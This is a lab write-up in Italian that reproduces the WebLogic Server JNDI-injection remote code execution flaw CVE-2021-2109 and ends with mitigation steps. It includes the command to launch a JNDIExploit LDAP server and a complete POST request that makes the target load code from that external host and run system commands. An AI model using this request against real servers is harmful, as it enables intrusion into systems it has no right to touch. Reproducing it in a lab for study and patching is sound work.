
Riproduzione e analisi passo-passo della CVE-2021-2109, una vulnerabilità di esecuzione di codice remoto nel server WebLogic tramite iniezione JNDI, con POC e guida alla mitigazione.
CVE-2021-2109 Weblogic Server远程代码执行漏洞复现及分析
Nel gennaio 2021, Oracle ha rilasciato aggiornamenti di sicurezza, inclusi 329 nuovi patch di sicurezza per la famiglia di prodotti Oracle. In questo annuncio è stato menzionato in particolare l'avviso di sicurezza per Oracle WebLogic Server relativo a CVE-2020-14750, rilasciato il 1º novembre 2020. Si consiglia vivamente ai clienti di applicare questo aggiornamento della patch e le altre patch contenute in questo annuncio. Il codice CVE-2021-2109 identifica una vulnerabilità di esecuzione remota di codice su WebLogic. La vulnerabilità è dovuta principalmente all'iniezione JNDI, che consente agli aggressori di sfruttare questa vulnerabilità per l'esecuzione remota di codice.
Versioni interessate: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0
Utilizzare DOCKER per configurare un ambiente di test Weblogic Server. Weblogic Server è accessibile normalmente.


Avviare LDAP sulla macchina locale. Può essere scaricato da https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. Il comando è il seguente: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

Inviare il pacchetto POC di iniezione JNDI per la vulnerabilità di esecuzione remota di codice su Weblogic Server CVE-2021-2109: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

Eseguire il comando di sistema ipconfig tramite la variabile cmd


Eseguire calc.exe tramite la variabile cmd per aprire la calcolatrice di sistema.


La calcolatrice di sistema si apre.

Raccomandazioni di sicurezza per la vulnerabilità di esecuzione remota di codice su Weblogic Server CVE-2021-2109
Disabilitare il protocollo T3 Se non si dipende dal protocollo T3 per la comunicazione JVM, è possibile mitigare l'impatto di questa vulnerabilità bloccando temporaneamente il protocollo T3. 1). Accedere alla console di Weblogic, nella pagina di configurazione di base_domain, andare alla scheda 'Sicurezza', fare clic su 'Filtri' e configurare il filtro. 2). Nel filtro di connessione inserire: weblogic.security.net.ConnectionFilterImpl, nel campo delle regole del filtro di connessione inserire: * * 7001 deny t3 t3s.
Disabilitare l'uso di IIOP Accedere alla console di Weblogic, trovare l'opzione 'Abilita IIOP', deselezionarla e riavviare per rendere effettiva la modifica.
Disabilitare temporaneamente l'accesso esterno a /console/console.portal
Applicare la patch di sicurezza ufficiale